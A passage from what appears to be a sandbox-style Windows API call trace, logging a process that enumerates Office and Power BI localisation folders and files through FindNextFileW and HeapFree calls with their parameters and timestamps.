ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0296.217] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.217] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x146e0bdc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0296.220] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.220] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0296.226] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.255] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14ac0994, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0296.262] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.262] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0296.266] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.266] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0296.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.274] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerBI.Diagnostics.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0296.281] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.281] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15a3fea8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0296.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.284] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0296.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.302] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0296.306] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.306] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0296.308] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.308] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15be380c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0296.310] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.310] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0296.630] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.630] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0296.634] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.634] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0296.639] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.639] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0296.644] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.644] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f04999, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-cyrl", cAlternateFileName="")) returned 1 [0296.649] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.649] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0296.654] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.654] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0296.658] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.658] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16035c5a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0296.663] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.663] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0296.668] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.668] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16140cde, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0296.959] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.959] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0296.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.962] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0296.964] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.964] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0297.065] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.065] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0297.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.067] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0297.067] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0297.068] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0297.068] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerPivot Excel Add-in", cAlternateFileName="POWERP~1")) returned 1 [0297.071] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.072] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0297.075] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.075] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0297.078] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.078] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0297.081] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.081] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0297.084] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.084] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0297.088] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.088] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0297.091] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.091] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0297.094] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.094] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0297.094] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.094] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0297.245] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.245] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0297.251] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.251] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0297.257] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.257] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0297.263] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.264] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: 